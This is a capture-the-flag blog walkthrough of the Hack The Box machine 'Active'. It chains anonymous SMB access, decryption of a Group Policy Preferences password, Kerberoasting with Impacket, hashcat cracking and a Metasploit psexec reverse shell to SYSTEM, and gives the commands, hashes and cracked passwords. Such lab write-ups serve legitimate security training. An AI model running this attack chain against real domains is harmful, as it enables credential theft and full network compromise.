I had so much fun with this recently retired box. My skill set with Active Directory was lacking, so this was quite a learning experience!

Enumeration

Nmap baby, Nmap:

nmap -sC -sV -p- -oA initial 10.10.10.100 Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-02 18:13 UTC PORT STATE SERVICE VERSION 53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1) | dns-nsid: |_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39) 88/tcp open tcpwrapped 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open tcpwrapped 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5722/tcp open msrpc Microsoft Windows RPC 9389/tcp open mc-nmf .NET Message Framing 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49152/tcp open msrpc Microsoft Windows RPC 49153/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC 49155/tcp open msrpc Microsoft Windows RPC 49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49158/tcp open msrpc Microsoft Windows RPC 49169/tcp open msrpc Microsoft Windows RPC 49172/tcp open msrpc Microsoft Windows RPC 49182/tcp open msrpc Microsoft Windows RPC Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: -1m18s, deviation: 0s, median: -1m18s | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2018-08-02 18:13:42 |_ start_date: 2018-08-02 09:21:01

Wow, thats a lot of ports. From the inital scan, we can safely say that we are dealing with a Windows machine here. A couple of ports stand out: DNS (53), Samba (445), RPC (all over the place). I initially ran enum4linux on the box to explore the Samba shares, but found the smbmap tool while writing this post which gives a much more clear view of the situation:

smbmap -H 10.10.10.100 [+] Finding open SMB ports.... [+] User SMB session establishd on 10.10.10.100... [+] IP: 10.10.10.100:445 Name: 10.10.10.100 Disk Permissions ---- ----------- ADMIN$ NO ACCESS C$ NO ACCESS IPC$ NO ACCESS NETLOGON NO ACCESS Replication READ ONLY SYSVOL NO ACCESS Users NO ACCESS

Let’s fire up smbclient to access the Replication share. Just press enter to login anonymously.

smbclient //10.10.10.100/Replication Unable to initialize messaging context Enter WORKGROUP\user's password: Anonymous login successful Try "help" to get a list of possible commands. smb: \&gt;

Cool, that worked. Instead of going through all the directories on this share, I ran smbmap again, but this time the -R argument to list all directories. See what I found:

smbmap -H 10.10.10.100 -R [+] Finding open SMB ports.... [+] User SMB session establishd on 10.10.10.100... [+] IP: 10.10.10.100:445 Name: 10.10.10.100 Disk Permissions ---- ----------- ADMIN$ NO ACCESS C$ NO ACCESS IPC$ NO ACCESS NETLOGON NO ACCESS Replication READ ONLY .\ dr--r--r-- 0 Sat Jul 21 10:37:44 2018 . dr--r--r-- 0 Sat Jul 21 10:37:44 2018 .. dr--r--r-- 0 Sat Jul 21 10:37:44 2018 active.htb *** Snip*** .\\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\ dr--r--r-- 0 Sat Jul 21 10:37:44 2018 . dr--r--r-- 0 Sat Jul 21 10:37:44 2018 .. -r--r--r-- 533 Sat Jul 21 10:38:11 2018 Groups.xml

Ah, the infamous Groups.xml. From this excellent blog post:

Group policy preferences allows domain admins to create and deploy across the domain local users and local administrators accounts. This feature was introduced in Windows 2008 Server however it can be abused by an attacker since the credentials of these accounts are stored encrypted and the public key is published by Microsoft. This leaves the door open to any user to retrieve these files and decrypt the passwords stored in order to elevate access.

These files are stored in a shared directory in the domain controller and any authenticated user in the domain has read access to these files since it is needed in order to obtain group policy updates.

The contents of Groups.xml is the following:

&lt;?xml version="1.0" encoding="utf-8"?&gt; &lt;Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"&gt;&lt;User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"&gt;&lt;Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/&gt;&lt;/User&gt; &lt;/Groups&gt;

So we see 3 key values here:

The domain (active.htb) Username (SVC_TGS) And the actual value (cpassword)

The stored value can be decrypted using either a Metasploit module, PowerSploit module or this tool I used called Gpprefdecrypt.py I’ve edited the hash and password a bit to prevent to usual Google-fu.

python Gpprefdecrypt.py [e]dBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ [G]PPstillStandingStrong2k18

Exploitation

I switched to the Impacket toolset, based on the Kerberoasting posts I’ve found as noted on the tools page.

python GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS Impacket v0.9.18-dev - Copyright 2002-2018 Core Security Technologies Password: ServicePrincipalName Name MemberOf PasswordLastSet LastLogon -------------------- ------------- -------------------------------------------------------- ------------------- ------------------- active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 19:06:40 2018-07-30 17:17:40 $[k]rb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$93a0a6cf83fa8e765bacccf1ea177432$b910699f5f73c858e8300ed38048b5fb0e7cfcadaef468c7fc8f80b41858e444c7586cde377debef18c50f6a9f13857887b31c808e7af81282a4eddbfb1da2610591908db563fb202762e28eb6f0157f70b8aa98dd53d694276ef0f126b896e543e2812b4b27461af3e791b7c4dcb245241a2706df6ae19da51750c470cdd010675d1d0ccba4e5ef5f656f230837f1e03b6eb6cf413559df7f8c11ae7dab8118bc1e99c7ebc1c2c4b7ff6f5b9ae04cd3f5013dcd21b4c34cc68a6cf56198a001adb38e847d9fde80b6d52b7f4357f59dc2e2f0af0f29e27dd20934f90c330e22d96c109d4071d712d20bc9274cc52b0ce56b3f0ed5176fc39edc1a9bbbae78cad6a9b6e6b53b211188e591ae49e5147d27593ed27e3a0ce4bee9fce01b73296dfa1026980f6b5047c31c9a494272d9a5f9de5f0634202ab44fc476844eaa9fe89ac1a393075635d111b5ec9ffd3399769e7d1f401071786b00639d132726dc83af898c93ac7c1cfcc2da92a506cc50040f36e5607cc70e731c13c9e6a2d3419e6b43a855922bde75d45f5ee9083728c828bb75dcfde9b84fb27d80b5661648db357c10e8ddd28c29f035cef9722c8906cc5dbd09d0614a28fe4bcde476532a7b868cea09d270cdfe9df2ba11330519463bbfbaa074d900376bfcb277fd92a61a2b3c598d8b3d6f45f23642161e3a37af70bcde771823a72e356c0116ad5da190380f1e0a07816eb680d404e468e46a5ac64a7a631d4dd85520357b3d190ca10d09d12635d12360b89787f7ab607287c7f243ec70f98fd9b05325745a91d25de64fdfdaf0ec72226c17f8a990a0465d84c7750213f36efaf7087b1f293b29cabd26abb7101d06865fa307a0ce39a2a80f294a485174564d3928d4920e07e6a44b0ac22d4f181d42c0c6baec02554f6995d2031160f9cc6d3819dbbb263be35de395951b27ed1d0ccf73e3724a0a7606ec8f5f5e84a47b4da508d277aa1967ef66c057cb031a4a06f8a3709f6ee2c2043316c2bcdd4740c685028eab2878d07edb164346bbfe3166680cac8c6d96c480dd6cf2c7d0a04f4d889ef26a887124ae28d28c709811f8f45a9f31d1f4aa77c2cc4311b76e54dd83a927d175dc91e34971528c2365175ef8d19db024f6b997901424da839c6b86df032a2db7841c69e40a3448dbcfc13b9aa51127d8f59605d35ac16fb9967ecaf9fbb011c979c8d30b62a6f08131f5fd3672fedbcf4f53e04ebe954841b32f6796c2a719

What we have here is the hash of the Kerberos ticket for the administrator account. With the Kerberos hash in place, I can start cracking it with Hashcat. I’ve put the hash into a file named administrator_hash.txt, use rockyou.txt as a wordlist and use –force to override some errors what I got:

hashcat -m 13100 -a 0 administrator_hash.txt /usr/share/wordlists/rockyou.txt --force **Cracking*** Output = T[i]cketmaster1968

There we have the administrator password. Nice.

Privilege escalation

Finally, you can use psexec.py from the Impacket package to pass the cracked hash to the server to login. Or just login with smbclient using administrator and the cracked hash. I opted for the Metasploit module in this case, with a reverse TCP shell:

Module options (exploit/windows/smb/psexec): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 10.10.10.100 yes The target address RPORT 445 yes The SMB service port (TCP) SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing SERVICE_DISPLAY_NAME no The service display name SERVICE_NAME no The service name SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share SMBDomain . no The Windows domain to use for authentication SMBPass Ticketmaster1968 no The password for the specified username SMBUser Administrator no The username to authenticate as Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST tun0 yes The listen address (an interface may be specified) LPORT 443 yes The listen port Exploit target: Id Name -- ---- 0 Automatic

If all goes well, you will spawn a shell at the box as SYSTEM. Simply go to the desktop of the administrator for the root flag. You can even get the user flag from the user desktop.

[*] Started reverse TCP handler on 10.10.14.10:443 [*] 10.10.10.100:445 - Connecting to the server... [*] 10.10.10.100:445 - Authenticating to 10.10.10.100:445 as user 'Administrator'... [*] 10.10.10.100:445 - Selecting PowerShell target [*] 10.10.10.100:445 - Executing the payload... [+] 10.10.10.100:445 - Service start timed out, OK if running a command or non-service executable... [*] Sending stage (179779 bytes) to 10.10.10.100 [*] Meterpreter session 1 opened (10.10.14.10:443 -> 10.10.10.100:63354) at 2018-12-11 01:55:49 +0000 meterpreter > shell Process 2000 created. Channel 1 created. Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami nt authority\system

Psexec output as well:

/psexec.py -target-ip 10.10.10.100 administrator@active.htb Impacket v0.9.18-dev - Copyright 2002-2018 Core Security Technologies Password: [*] Requesting shares on 10.10.10.100..... [*] Found writable share ADMIN$ [*] Uploading file GtlPZcTM.exe [*] Opening SVCManager on 10.10.10.100..... [*] Creating service OAuq on 10.10.10.100..... [*] Starting service OAuq..... [!] Press help for extra shell commands Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami nt authority\system

And as always, the Ippsec video on this box.